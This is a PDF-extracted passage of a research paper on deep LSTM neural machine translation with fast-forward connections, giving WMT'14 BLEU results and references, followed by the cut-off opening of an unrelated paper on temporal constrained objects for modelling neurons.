the embedding of the tth word in the source sentence. For the de- coder xt is the concatenation of the embedding of the tth word in the target sentence and the encoder representation for step t. In our final model two additional operations are used with Eq. 5, which is shown in Eq. 6. Half(f) denotes the first half of the elements of f, and Dr(h) is the dropout operation (Hinton et al., 2012) which randomly sets an element of h to zero with a cer- tain probability. The use of Half(·) is to reduce the parameter size and does not affect the perfor- mance. We observed noticeable performance degra- dation when using only the first third of the elements of “f”. fkt = W k f · [Half(fk−1t ),Dr(hk−1t )], k > 1 (6) With the F-F connections, we build a fast channel to propagate the gradients in the deep topology. F-F 374 connections can accelerate the model convergence and while improving the performance. A similar idea was also used in (He et al., 2016; Zhou and Xu, 2015). Encoder: The LSTM layers are stacked following Eq. 5. We call this type of encoder interleaved bi- directional encoder. In addition, there are two sim- ilar columns (a1 and a2) in the encoder part. Each column consists of ne stacked LSTM layers. There is no connection between the two columns. The first layers of the two columns process the word repre- sentations of the source sequence in different direc- tions. At the last LSTM layers, there are two groups of vectors representing the source sequence. The group size is the same as the length of the input se- quence. Interface: Prior encoder-decoder models and atten- tion models are different in their method of extract- ing the representations of the source sequences. In our work, as a consequence of the introduced F-F connections, we have 4 output vectors (hnet and f ne t of both columns). The representations are modified for both Deep-ED and Deep-Att. For Deep-ED, et is static and consists of four parts. 1: The last time step output hnem of the first column. 2: Max-operation Max(·) of hnet at all time steps of the second column, denoted by Max(hne,a2t ). Max(·) denotes obtaining the maximal value for each dimension over t. 3: Max(f ne,a1 t ). 4: Max(f ne,a2 t ). The max-operation and last time step state extraction provide compli- mentary information but do not affect the perfor- mance much. et is used as the final representation ct. For Deep-Att, we do not need the above two op- erations. We only concatenate the 4 output vectors at each time step to obtain et, and a soft attention mechanism (Bahdanau et al., 2015) is used to calcu- late the final representation ct from et. et is summa- rized as: Deep-ED: et [hne,a1m ,Max(h ne,a2 t ),Max(f ne,a1 t ),Max(f ne,a2 t )] Deep-Att: et [h ne,a1 t ,h ne,a2 t ,f ne,a1 t ,f ne,a2 t ] (7) Note that the vector dimensionality of f is four times larger than that of h (see Eq. 4). ct is summarized as: Deep-ED: ct = et, (const) Deep-Att: ct = m∑ t′=1 αt,t′Wpet′ (8) αt,t′ is the normalized attention weight computed by: αt,t′ = exp(a(Wpet′,h 1,dec t−1 ))∑ t′′ exp(a(Wpet′′,h 1,dec t−1 )) (9) h 1,dec t−1 is the first hidden layer output in the decoding part. a(·) is an alignment model described in (Bah- danau et al., 2015). For Deep-Att, in order to re- duce the memory cost, we linearly project (with Wp) the concatenated vector et to a vector with 1/4 di- mension size, denoted by the (fully connected) block “fc” in Fig. 2. Decoder: The decoder follows Eq. 5 and Eq. 6 with fixed direction term −1. At the first layer, we use the following xt: xt = [ct,yt−1] (10) yt−1 is the target word embedding at the previous time step and y0 is zero. There is a single column of nd stacked LSTM layers. We also use the F-F connections like those in the encoder and all layers are in the forward direction. Note that at the last LSTM layer, we only use ht to make the prediction with a softmax layer. Although the network is deep, the training tech- nique is straightforward. We will describe this in the next part. 3.2 Training technique We take the parallel data as the only input without using any monolingual data for either word repre- sentation pre-training or language modeling. Be- cause of the deep bi-directional structure, we do not need to reverse the sequence order as Sutskever et al. (2014). The deep topology brings difficulties for the model training, especially when first order methods such as stochastic gradient descent (SGD) (LeCun et al., 1998) are used. The parameters should be properly initialized and the converging process can 375 + I it . r r r r it .I r r r r r r r r r r r r … … … … … k = 2 .. . en co di ng ve ct or s Je . r r r … … … … … … predicted w ords 1e  2e  3e  4e  1e  2e  3e  4e  1e  2e  3e  4e  1e  2e  3e  4e  2d 3d 4d 4 1 1i i a   ia <s> r 1d fc enjoy enjoy l'app- récie ff ff ff ff ff ff ff ff f f ff Encoder Interface Decoder ie  ie  r F- F co nn ec tio n F- F co nn ec tio n F- F co nn ec tio n 1c 2c 3c 4c ' ie k = 1 ... k = 1 … … … … … Figure 2: The network. It includes three parts from left to right: encoder part (P-E), interface (P-I) and decoder part (P-D). We only show the topology of Deep-Att as an example. “f” and “r” blocks correspond to the feed-forward part and the subsequent LSTM computation. The F-F connections are denoted by dashed red lines. be slow. We tried several optimization techniques such as AdaDelta (Zeiler, 2012), RMSProp (Tiele- man and Hinton, 2012) and Adam (Kingma and Ba, 2015). We found that all of them were able to speed up the process a lot compared to simple SGD while no significant performance difference was ob- served among them. In this work, we chose Adam for model training and do not present a detailed com- parison with other optimization methods. Dropout (Hinton et al., 2012) is also used to avoid over-fitting. It is utilized on the LSTM nodes hkt (See Eq. 5) with a ratio of pd for both the encoder and decoder. During the whole model training process, we keep all hyper parameters fixed without any intermediate interruption. The hyper parameters are selected ac- cording to the performance on the development set. For such a deep and large network, it is not easy to determine the tuning strategy and this will be con- sidered in future work. 3.3 Generation We use the common left-to-right beam-search method for sequence generation. At each time step t, the word yt can be predicted by: ŷt = arg max y P(y|ŷ0:t−1,x;θ) (11) where ŷt is the predicted target word. ŷ0:t−1 is the generated sequence from time step 0 to t − 1. We keep nb best candidates according to Eq. 11 at each time step, until the end of sentence mark is gener- ated. The hypotheses are ranked by the total like- lihood of the generated sequence, although normal- ized likelihood is used in some works (Jean et al., 2015). 4 Experiments We evaluate our method mainly on the widely used WMT’14 English-to-French translation task. In or- der to validate our model on more difficult lan- guage pairs, we also provide results on the WMT’14 English-to-German translation task. Our models are implemented in the PADDLE (PArallel Distributed Deep LEarning) platform. 4.1 Data sets For both tasks, we use the full WMT’14 parallel cor- pus as our training data. The detailed data sets are listed below: • English-to-French: Europarl v7, Common Crawl, UN, News Commentary, Gigaword • English-to-German: Europarl v7, Common Crawl, News Commentary In total, the English-to-French corpus includes 36 million sentence pairs, and the English-to-German corpus includes 4.5 million sentence pairs. The news-test-2012 and news-test-2013 are concate- nated as our development set, and the news-test- 2014 is the test set. Our data partition is consistent 376 with previous works on NMT (Luong et al., 2015; Jean et al., 2015) to ensure fair comparison. For the source language, we select the most fre- quent 200K words as the input vocabulary. For the target language we select the most frequent 80K French words and the most frequent 160K German words as the output vocabulary. The full vocab- ulary of the German corpus is larger (Jean et al., 2015), so we select more German words to build the target vocabulary. Out-of-vocabulary words are re- placed with the unknown symbol 〈unk〉. For com- plete comparison to previous work on the English- to-French task, we also show the results with a smaller vocabulary of 30K input words and 30K out- put words on the sub train set with selected 12M par- allel sequences (Schwenk, 2014; Sutskever et al., 2014; Cho et al., 2014). 4.2 Model settings We have two models as described above, named Deep-ED and Deep-Att. Both models have exactly the same configuration and layer size except the in- terface part P-I. We use 256 dimensional word embeddings for both the source and target languages. All LSTM layers, including the 2×ne layers in the encoder and the nd layers in the decoder, have 512 memory cells. The output layer size is the same as the size of the target vocabulary. The dimension of ct is 5120 and 1280 for Deep-ED and Deep-Att respectively. For each LSTM layer, the activation functions for gates, inputs and outputs are sigmoid, tanh, and tanh re- spectively. Our network is narrow on word embeddings and LSTM layers. Note that in previous work (Sutskever et al., 2014; Bahdanau et al., 2015), 1000 dimensional word embeddings and 1000 di- mensional LSTM layers are used. We also tried larger scale models but did not obtain further im- provements. 4.3 Optimization Note that each LSTM layer includes two parts as described in Eq. 3, feed-forward computation and recurrent computation. Since there are non-linear activations in the recurrent computation, a larger learning rate lr = 5 × 10−4 is used, while for the feed-forward computation a smaller learning rate lf = 4 × 10−5 is used. Word embeddings and the softmax layer also use this learning rate lf . We refer all the parameters not used for recurrent computa- tion as non-recurrent part of the model. Because of the large model size, we use strong L2 regularization to constrain the parameter matrix v in the following way: v ← v − l · (g + r ·v) (12) Here r is the regularization strength, l is the corre- sponding learning rate, g stands for the gradients of v. The two embedding layers are not regularized. All the other layers have the same r = 2. The parameters of the recurrent computation part are initialized to zero. All non-recurrent parts are randomly initialized with zero mean and standard deviation of 0.07. A detailed guide for setting hyper- parameters can be found in (Bengio, 2012). The dropout ratio pd is 0.1. In each batch, there are 500 ∼ 800 sequences in our work. The exact number depends on the sequence lengths and model size. We also find that larger batch size results in better convergence although the improvement is not large. However, the largest batch size is constrained by the GPU memory. We use 4 ∼ 8 GPU machines (each has 4 K40 GPU cards) running for 10 days to train the full model with parallelization at the data batch level. It takes nearly 1.5 days for each pass. One thing we want to emphasize here is that our deep model is not sensitive to these settings. Small variation does not affect the final performance. 4.4 Results We evaluate the same way as previous NMT works (Sutskever et al., 2014; Luong et al., 2015; Jean et al., 2015). All reported BLEU scores are computed with the multi-bleu.perl1 script which is also used in the above works. The results are for tokenized and case sensitive evaluation. 4.4.1 Single models English-to-French: First we list our single model results on the English-to-French task in Tab. 1. In the first block we show the results with the full 1https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/generic/ multi-bleu.perl 377 corpus. The previous best single NMT encoder- decoder model (Enc-Dec) with six layers achieves BLEU=31.5 (Luong et al., 2015). From Deep-ED, we obtain the BLEU score of 36.3, which outper- forms Enc-Dec model by 4.8 BLEU points. This result is even better than the ensemble result of eight Enc-Dec models, which is 35.6 (Luong et al., 2015). This shows that, in addition to the convolutional lay- ers for computer vision, deep topologies can also work for LSTM layers. For Deep-Att, the perfor- mance is further improved to 37.7. We also list the previous state-of-the-art performance from a con- ventional SMT system (Durrani et al., 2014) with the BLEU of 37.0. This is the first time that a single NMT model trained in an end-to-end form beats the best conventional system on this task. We also show the results on the smaller data set with 12M sentence pairs and 30K vocabulary in the second block. The two attention mod- els, RNNsearch (Bahdanau et al., 2015) and RNNsearch-LV (Jean et al., 2015), achieve BLEU scores of 28.5 and 32.7 respectively. Note that RNNsearch-LV uses a large output vocabulary of 500K words based on the standard attention model RNNsearch. We obtain BLEU=35.9 which outper- forms its corresponding shallow model RNNsearch by 7.4 BLEU points. The SMT result from (Schwenk, 2014) is also listed and falls behind our model by 2.6 BLEU points. Methods Data Voc BLEU Enc-Dec (Luong,2015) 36M 80K 31.5 SMT (Durrani,2014) 36M Full 37.0 Deep-ED (Ours) 36M 80K 36.3 Deep-Att (Ours) 36M 80K 37.7 RNNsearch (Bahdanau,2014) 12M 30K 28.5 RNNsearch-LV (Jean,2015) 12M 500K 32.7 SMT (Schwenk,2014) 12M Full 33.3 Deep-Att (Ours) 12M 30K 35.9 Table 1: English-to-French task: BLEU scores of single neural models. We also list the conventional SMT system for comparison. Moreover, during the generation process, we ob- tained the best BLEU score with beam size = 3 (when the beam size is 2, there is only a 0.1 dif- ference in BLEU score). This is different from other works listed in Tab. 1, where the beam size is 12 (Jean et al., 2015; Sutskever et al., 2014). We at- tribute this difference to the improved model per- formance, where the ground truth generally exists in the top hypothesis. Consequently, with the much smaller beam size, the generation efficiency is sig- nificantly improved. Next we list the effect of the novel F-F connec- tions in our Deep-Att model of shallow topology in Tab. 2. When ne = 1 and nd = 1, the BLEU scores are 31.2 without F-F and 32.3 with F-F. Note that the model without F-F is exactly the standard attention model (Bahdanau et al., 2015). Since there is only a single layer, the use of F-F connections means that at the interface part we include ft into the represen- tation (see Eq. 7). We find F-F connections bring an improvement of 1.1 in BLEU. After we increase our model depth to ne = 2 and nd = 2, the improve- ment is enlarged to 1.4. When the model is trained with larger depth without F-F connections, we find that the parameter exploding problem (Bengio et al., 1994) happens so frequently that we could not finish training. This suggests that F-F connections provide a fast way for gradient propagation. Models F-F ne nd BLEU Deep-Att No 1 1 31.2 Deep-Att Yes 1 1 32.3 Deep-Att No 2 2 33.3 Deep-Att Yes 2 2 34.7 Table 2: The effect of F-F. We list the BLEU scores of Deep-Att with and without F-F. Because of the param- eter exploding problem, we can not list the model per- formance of larger depth without F-F. For ne = 1 and nd = 1, F-F connections only contribute to the represen- tation at interface part (see Eq. 7). Removing F-F connections also reduces the cor- responding model size. In order to figure out the effect of F-F comparing models with the same pa- rameter size, we increase the LSTM layer width of Deep-Att without F-F. In Tab. 3 we show that, after using a two times larger LSTM layer width of 1024, we can only obtain a BLEU score of 33.8, which is still worse than the corresponding Deep-Att with F-F. We also notice that the interleaved bi-directional encoder starts to work when the encoder depth is larger than 1. The effect of the interleaved bi- directional encoder is shown in Tab. 4. For our largest model with ne = 9 and nd = 7, we compared 378 Models F-F ne nd width BLEU Deep-Att No 2 2 512 33.3 Deep-Att No 2 2 1024 33.8 Deep-Att Yes 2 2 512 34.7 Table 3: BLEU scores with different LSTM layer width in Deep-Att. After using two times larger LSTM layer width of 1024, we can only obtain BLEU score of 33.8. It is still behind the corresponding Deep-Att with F-F. the BLEU scores of the interleaved bi-directional encoder and the uni-directional encoder (where all LSTM layers work in forward direction). We find there is a gap of about 1.5 points between these two encoders for both Deep-Att and Deep-ED. Models Encoder ne nd BLEU Deep-Att Bi 9 7 37.7 Deep-Att Uni 9 7 36.2 Deep-ED Bi 9 7 36.3 Deep-ED Uni 9 7 34.9 Table 4: The effect of the interleaved bi-directional en- coder. We list the BLEU scores of our largest Deep-Att and Deep-ED models. The encoder term Bi denotes that the interleaved bi-directional encoder is used. Uni de- notes a model where all LSTM layers work in forward direction. Next we look into the effect of model depth. In Tab. 5, starting from ne = 1 and nd = 1 and gradu- ally increasing the model depth, we significantly in- crease BLEU scores. With ne = 9 and nd = 7, the best score for Deep-Att is 37.7. We tried to increase the LSTM width based on this, but obtained little improvement. As we stated in Sec.2, the complexity of the encoder and decoder, which is related to the model depth, is more important than the model size. We also tried a larger depth, but the results started to get worse. With our topology and training tech- nique, ne = 9 and nd = 7 is the best depth we can achieve. The last line in Tab. 5 shows the BLEU score of 36.6 of our deepest model, where only one encod- ing column (Col = 1) is used. We find a 1.1 BLEU points degradation with a single encoding column. Note that the uni-directional models in Tab. 4 with uni-direction still have two encoding columns. In order to find out whether this is caused by the de- creased parameter size, we test a wider model with Models F-F ne nd Col BLEU Deep-Att Yes 1 1 2 32.3 Deep-Att Yes 2 2 2 34.7 Deep-Att Yes 5 3 2 36.0 Deep-Att Yes 9 7 2 37.7 Deep-Att Yes 9 7 1 36.6 Table 5: BLEU score of Deep-Att with different model depth. With ne = 1 and nd = 1, F-F connections only contribute to the representation at interface part where ft is included (see Eq. 7). 1024 memory blocks for the LSTM layers. It is shown in Tab. 6 that there is a minor improvement of only 0.1. We attribute this to the complementary in- formation provided by the double encoding column. Models F-F ne nd Col width BLEU Deep-Att Yes 9 7 2 512 37.7 Deep-Att Yes 9 7 1 512 36.6 Deep-Att Yes 9 7 1 1024 36.7 Table 6: Comparison of encoders with different number of columns and LSTM layer width. English-to-German: We also validate our deep topology on the English-to-German task. The English-to-German task is considered a relatively more difficult task, because of the lower similarity between these two languages. Since the German vo- cabulary is much larger than the French vocabulary, we select 160K most frequent words as the target vo- cabulary. All the other hyper parameters are exactly the same as those in the English-to-French task. We list our single model Deep-Att performance in Tab. 7. Our single model result with BLEU=20.6 is similar to the conventional SMT result of 20.7 (Buck et al., 2014). We also outperform the shallow at- tention models as shown in the first two lines in Tab. 7. All the results are consistent with those in the English-to-French task. 4.4.2 Post processing Two post processing techniques are used to im- prove the performance further on the English-to- French task. First, three Deep-Att models are built for ensem- ble results. They are initialized with different ran- dom parameters; in addition, the training corpus 379 Methods Data Voc BLEU RNNsearch (Jean,2015) 4.5M 50K 16.5 RNNsearch-LV (Jean,2015) 4.5M 500K 16.9 SMT (Buck,2014) 4.5M Full 20.7 Deep-Att (Ours) 4.5M 160K 20.6 Table 7: English-to-German task: BLEU scores of single neural models. We also list the conventional SMT system for comparison. for these models is shuffled with different random seeds. We sum over the predicted probabilities of the target words and normalize the final distribution to generate the next word. It is shown in Tab. 8 that the model ensemble can improve the performance further to 38.9. In Luong et al. (2015) and Jean et al. (2015) there are eight models for the best scores, but we only use three models and we do not obtain further gain from more models. Methods Model Data Voc BLEU Deep-ED Single 36M 80K 36.3 Deep-Att Single 36M 80K 37.7 Deep-Att Single+PosUnk 36M 80K 39.2 Deep-Att Ensemble 36M 80K 38.9 Deep-Att Ensemble+PosUnk 36M 80K 40.4 SMT Durrani, 2014 36M Full 37.0 Enc-Dec Ensemble+PosUnk 36M 80K 37.5 Table 8: BLEU scores of different models. The first two blocks are our results of two single models and mod- els with post processing. In the last block we list two baselines of the best conventional SMT system and NMT system. Second, we recover the unknown words in the generated sequences with the Positional Unknown (PosUnk) model introduced in (Luong et al., 2015). The full parallel corpus is used to obtain the word mappings (Liang et al., 2006). We find this method provides an additional 1.5 BLEU points, which is consistent with the conclusion in Luong et al. (2015). We obtain the new BLEU score of 39.2 with a single Deep-Att model. For the ensemble models of Deep-Att, the BLEU score rises to 40.4. In the last two lines, we list the conventional SMT model (Durrani et al., 2014) and the previous best neural models based system Enc-Dec (Luong et al., 2015) for comparison. We find our best score outperforms the previous best score by nearly 3 points. 4.5 Analysis 4.5.1 Length On the English-to-French task, we analyze the effect of the source sentence length on our mod- els as shown in Fig. 3. Here we show five curves: our Deep-Att single model, our Deep-Att ensemble model, our Deep-ED model, a previously proposed Enc-Dec model with four layers (Sutskever et al., 2014) and an SMT model (Durrani et al., 2014). We find our Deep-Att model works better than the 4 7 8 12 17 22 28 35 79 5 10 15 20 25 30 35 40 Sentences by Length B L E U Deep−Att single model Deep−Att ensemble 3 models Deep−ED single model Enc−Dec 4 layers (Sutskever, 2014) SMT (Durrani, 2014) Figure 3: BLEU scores vs. source sequence length. Five lines are our Deep-Att single model, Deep-Att ensem- ble model, our Deep-ED model, previous Enc-Dec model with four layers and SMT model. previous two models (Enc-Dec and SMT) on nearly all sentence lengths. It is also shown that for very long sequences with length over 70 words, the per- formance of our Deep-Att does not degrade, when compared to another NMT model Enc-Dec. Our Deep-ED also has much better performance than the shallow Enc-Dec model on nearly all lengths, al- though for long sequences it degrades and starts to fall behind Deep-Att. 4.5.2 Unknown words Next we look into the detail of the effect of un- known words on the English-to-French task. We select the subset without unknown words on target sentences from the original test set. There are 1705 such sentences (56.8%). We compute the BLEU scores on this subset and the results are shown in Tab. 9. We also list the results from SMT model (Durrani et al., 2014) as a comparison. We find that the BLEU score of Deep-Att on this subset rises to 40.3, which has a gap of 2.6 with 380 Model Test set Ratio(%) BLEU Deep-Att Full 100.0 37.7 Ensemble Full 100.0 38.9 SMT(Durrani) Full 100.0 37.0 Deep-Att Subset 56.8 40.3 Ensemble Subset 56.8 41.4 SMT(Durrani) Subset 56.8 37.5 Table 9: BLEU scores of the subset of the test set without considering unknown words. 0 . 3 9 0 . 3 6 0 . 3 4 0 . 3 2 0 . 3 0 0 . 4 0 0 . 3 8 0 . 3 6 0 . 3 4 0 . 3 2 0 . 3 0 Te st T r a i n n e = 9 n d = 7 n e = 5 n d = 3 n e = 1 n d = 1 Figure 4: Token error rate on train set vs. test set. Square: Deep-Att (ne = 9, nd = 7). Circle: Deep-Att (ne = 5, nd = 3). Triagle: Deep-Att (ne = 1, nd = 1). the score 37.7 on the full test set. On this sub- set, the SMT model achieves 37.5, which is simi- lar to its score 37.0 on the full test set. This sug- gests that the difficulty on this subset is not much different from that on the full set. We therefore at- tribute the larger gap for Deep-att to the existence of unknown words. We also compute the BLEU score on the subset of the ensemble model and ob- tain 41.4. As a reference related to human perfor- mance, in Sutskever et al. (2014), it has been tested that the BLEU score of oracle re-scoring the LIUM 1000-best results (Schwenk, 2014) is 45. 4.5.3 Over-fitting Deep models have more parameters, and thus have a stronger ability to fit the large data set. However, our experimental results suggest that deep models are less prone to the problem of over-fitting. In Fig. 4, we show three results from models with a different depth on the English-to-French task. These three models are evaluated by token error rate, which is defined as the ratio of incorrectly predicted words in the whole target sequence with correct his- torical input. The curve with square marks corre- sponds to Deep-Att with ne = 9 and nd = 7. The curve with circle marks corresponds to ne = 5 and nd = 3. The curve with triangle marks corresponds to ne = 1 and nd = 1. We find that the deep model has better performance on the test set when the token error rate is the same as that of the shallow models on the training set. This shows that, with decreased token error rate, the deep model is more advanta- geous in avoiding the over-fitting phenomenon. We only plot the early training stage curves because, during the late training stage, the curves are not smooth. 5 Conclusion With the introduction of fast-forward connections to the deep LSTM network, we build a fast path with neither non-linear transformations nor recur- rent computation to propagate the gradients from the top to the deep bottom. On this path, gradients de- cay much slower compared to the standard deep net- work. This enables us to build the deep topology of NMT models. We trained NMT models with depth of 16 in- cluding 25 LSTM layers and evaluated them mainly on the WMT’14 English-to-French translation task. This is the deepest topology that has been in- vestigated in the NMT area on this task. We showed that our Deep-Att exhibits 6.2 BLEU points improvement over the previous best single model, achieving a 37.7 BLEU score. This single end-to- end NMT model outperforms the best conventional SMT system (Durrani et al., 2014) and achieves a state-of-the-art performance. After utilizing un- known word processing and model ensemble of three models, we obtained a BLEU score of 40.4, an improvement of 2.9 BLEU points over the pre- vious best result. When evaluated on the subset of the test corpus without unknown words, our model achieves 41.4. Our model is also validated on the more difficult English-to-German task. Our model is also efficient in sequence genera- tion. The best results from both a single model and model ensemble are obtained with a beam size of 3, much smaller than previous NMT systems where beam size is about 12 (Jean et al., 2015; Sutskever 381 et al., 2014). From our analysis, we find that deep models are more advantageous for learning for long sequences and that the deep topology is resistant to the over-fitting problem. We tried deeper models and did not obtain further improvements with our current topology and train- ing techniques. However, the depth of 16 is not very deep compared to the models in computer vi- sion (He et al., 2016). We believe we can benefit from deeper models, with new designs of topologies and training techniques, which remain as our future work. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of In- ternational Conference on Learning Representations. Yoshua Bengio, Patrice Simard, and Paolo Frasconi. 1994. Learning long-term dependencies with gradi- ent descent is difficult. IEEE Transactions on Neural Networks, 5(2):157–166. Yoshua Bengio, 2012. Practical Recommendations for Gradient-Based Training of Deep Architectures, pages 437–478. Springer Berlin Heidelberg, Berlin, Heidel- berg. Christian Buck, Kenneth Heafield, and Bas van Ooyen. 2014. N-gram counts and language models from the common crawl. In Proceedings of the Language Re- sources and Evaluation Conference. Kyunghyun Cho, Bart van Merrienboer, Caglar Gulcehre, Fethi Bougares, Holger Schwenk, and Yoshua Ben- gio. 2014. Learning phrase representations using rnn encoder-decoder for statistical machine transla- tion. In Proceedings of the Empiricial Methods in Nat- ural Language Processing. Nadir Durrani, Barry Haddow, Philipp Koehn, and Ken- neth Heafield. 2014. Edinburgh’s phrase-based ma- chine translation systems for WMT-14. In Proceed- ings of the Ninth Workshop on Statistical Machine Translation. Mikel L. Forcada and Ramón P. Ñeco. 1997. Recur- sive hetero-associative memories for translation. In Biological and Artificial Computation: From Neuro- science to Technology, Berlin, Heidelberg. Springer Berlin Heidelberg. Alex Graves, Marcus Liwicki, Santiago Fernandez, Ro- man Bertolami, Horst Bunke, and Jürgen Schmid- huber. 2009. A novel connectionist system for un- constrained handwriting recognition. IEEE Transac- tions on Pattern Analysis and Machine Intelligence, 31(5):855–868. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. 2016. Deep residual learning for image recog- nition. In IEEE Conference on Computer Vision and Pattern Recognition. Karl Moritz Hermann, Tomáš Kočiský, Edward Grefen- stette, Lasse Espeholt, Will Kay, Mustafa Suleyman, and Phil Blunsom. 2015. Teaching machines to read and comprehend. In Advances in Neural Information Processing Systems. Geoffrey E. Hinton, Nitish Srivastava, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2012. Im- proving neural networks by preventing co-adaptation of feature detectors. arXiv:1207.0580. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Sébastien Jean, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2015. On using very large target vo- cabulary for neural machine translation. In Proceed- ings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing. Nal Kalchbrenner and Phil Blunsom. 2013. Recurrent continuous translation models. In Proceedings of the Empirical Methods in Natural Language Processing. Nal Kalchbrenner, Ivo Danihelka, and Alex Graves. 2016. Grid long short-term memory. In Proceedings of International Conference on Learning Representa- tions. Diederik P. Kingma and Jimmy Lei Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of International Conference on Learning Representa- tions. P. Koehn, F. J. Och, and D. Marcu. 2003. Statistical phrase-based translation. In Proceedings of the North American Chapter of the Association for Computa- tional Linguistics on Human Language Technology. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. 1998. Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11):2278–2324. Percy Liang, Ben Taskar, and Dan Klein. 2006. Align- ment by agreement. In Proceedings of the North American Chapter of the Association of Computa- tional Linguistics on Human Language Technology. Thang Luong, Ilya Sutskever, Quoc Le, Oriol Vinyals, and Wojciech Zaremba. 2015. Addressing the rare word problem in neural machine translation. In Pro- ceedings of the 53rd Annual Meeting of the Associa- tion for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing. 382 Junhua Mao, Wei Xu, Yi Yang, Jiang Wang, Zhiheng Huang, and Alan L. Yuille. 2015. Deep captioning with multimodal recurrent neural networks (m-RNN). In Proceedings of International Conference on Learn- ing Representations. Holger Schwenk. 2014. http://www-lium.univ- lemans.fr/∼schwenk/cslm joint paper [online; ac- cessed 03-september-2014]. University Le Mans. Rupesh Kumar Srivastava, Klaus Greff, and Jürgen Schmidhuber. 2015. Highway networks. In Proceed- ings of the 32nd International Conference on Machine Learning, Deep Learning Workshop. Ilya Sutskever, Oriol Vinyals, and Quoc Le. 2014. Se- quence to sequence learning with neural networks. In Advances in Neural Information Processing Systems. Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Ser- manet, Scott Reed, Dragomir Anguelov, Dumitru Er- han, Vincent Vanhoucke, and Andrew Rabinovich. 2015. Going deeper with convolutions. In IEEE Con- ference on Computer Vision and Pattern Recognition. Tijmen Tieleman and Geoffrey Hinton. 2012. Lecture 6.5-rmsprop: Divide the gradient by a running aver- age of its recent magnitude. COURSERA: Neural Net- works for Machine Learning, 4. Oriol Vinyals and Quoc Le. 2015. A neural conver- sational model. In Proceedings of the 32nd Interna- tional Conference on Machine Learning, Deep Learn- ing Workshop. Kaisheng Yao, Trevor Cohn, Katerina Vylomova, Kevin Duh, and Chris Dyer. 2015. Depth-gated LSTM. arXiv:1508.03790. Yang Yu, Wei Zhang, Chung-Wei Hang, Bing Xiang, and Bowen Zhou. 2015. Empirical study on deep learning models for QA. arXiv:1510.07526. Matthew D. Zeiler. 2012. ADADELTA: An adaptive learning rate method. arXiv:1212.5701. Jie Zhou and Wei Xu. 2015. End-to-end learning of se- mantic role labeling using recurrent neural networks. In Proceedings of the 53rd Annual Meeting of the As- sociation for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing. 383 384 work_d2vjeeo4qjeyhn4ekhqacy6q3u ---- Temporal constrained objects for modelling neuronal dynamics Temporal constrained objects for modelling neuronal dynamics Manjusha Nair1,2, Jinesh Manchan Kannimoola3, Bharat Jayaraman4, Bipin Nair1 and Shyam Diwakar1 1 Amrita School of Biotechnology, Amrita Vishwa Vidyapeetham, Kollam, Kerala, India 2 Department of Computer Science and Applications, Amritapuri Campus, Amrita Vishwa Vidyapeetham, Kollam, Kerala, India 3 Center for Cybersecurity Systems and Networks, Amritapuri Campus, Amrita Vishwa Vidyapeetham, Kollam, Kerala, India 4 Department of Computer Science & Engineering, State University of New York at Buffalo, Buffalo, NY, USA ABSTRACT Background: Several new programming languages and technologies have emerged in the past few decades in order to ease the task of modelling complex systems. Modelling the dynamics of complex systems requires various levels of abstractions and reductive measures in representing the underlying behaviour. This also often requires making a trade-off between how realistic a model should be in order to address the scientific questions of interest and the computational tractability of the model. Methods: In this paper, we propose a novel programming paradigm, called temporal constrained objects, which facilitates a principled approach to modelling complex dynamical systems. Temporal constrained objects are an extension of constrained objects with a focus on the analysis and prediction of the dynamic behaviour of a system. The structural aspects of a neuronal system are represented using objects, as in object-oriented languages, while the dynamic behaviour of neurons and synapses are modelled using declarative temporal constraints. Computation in this paradigm is a process of constraint satisfaction within a time-based simulation. Results: We identified the feasibility and practicality in automatically mapping different kinds of neuron and synapse models to the constraints of temporal constrained objects. Simple neuronal networks were modelled by composing circuit components, implicitly satisfying the internal constraints of each component and interface constraints of the composition. Simulations show that temporal constrained objects provide significant conciseness in the formulation of these models. The underlying computational engine employed here automatically finds the solutions to the problems stated, reducing the code for modelling and simulation control. All examples reported in this paper have been programmed and successfully tested using the prototype language called TCOB. The code along with the programming environment are available at http://github.com/compneuro/ TCOB_Neuron. Discussion: Temporal constrained objects provide powerful capabilities for modelling the structural and dynamic aspects of neural systems. Capabilities of the constraint programming paradigm, such as declarative specification, the ability to express partial information and non-directionality, and capabilities of the object-oriented paradigm especially aggregation and inheritance, make this paradigm the right candidate for complex systems and computational modelling studies. With the advent of multi-core How to cite this article Nair et al. (2018), Temporal constrained objects for modelling neuronal dynamics. PeerJ Comput. Sci. 4:e159; DOI 10.7717/peerj-cs.159 Submitted 2 March 2018 Accepted 26 June 2018 Published 23 July 2018 Corresponding author Shyam Diwakar, shyam@amrita.edu Academic editor Nicolas Rougier Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.159 Copyright 2018 Nair et al. Distributed under Creative Commons CC-BY 4.0 http://github.com/compneuro/TCOB_Neuron http://github.com/compneuro/TCOB_Neuron http://dx.doi.org/10.7717/peerj-cs.159 mailto:shyam@�amrita.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.159 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ parallel computer architectures and techniques or parallel constraint-solving, the paradigm of temporal constrained objects lends itself to highly efficient execution which is necessary for modelling and simulation of large brain circuits. Subjects Computational Biology, Scientific Computing and Simulation, Programming Languages Keywords Temporal constrained objects, Constraint programming, Object-oriented languages, Declarative modelling, Neuron models INTRODUCTION Modelling complex systems using computer languages has spanned a wide range of domains: from organs and organ systems to weather and atmospheric turbulence to economic systems and social networks. While it is the responsibility of the programmer to choose an appropriate paradigm for the problem at hand, conventional languages are limited in their ability to provide the right framework for a broad range of problems. Models for complex problems tend to be large and 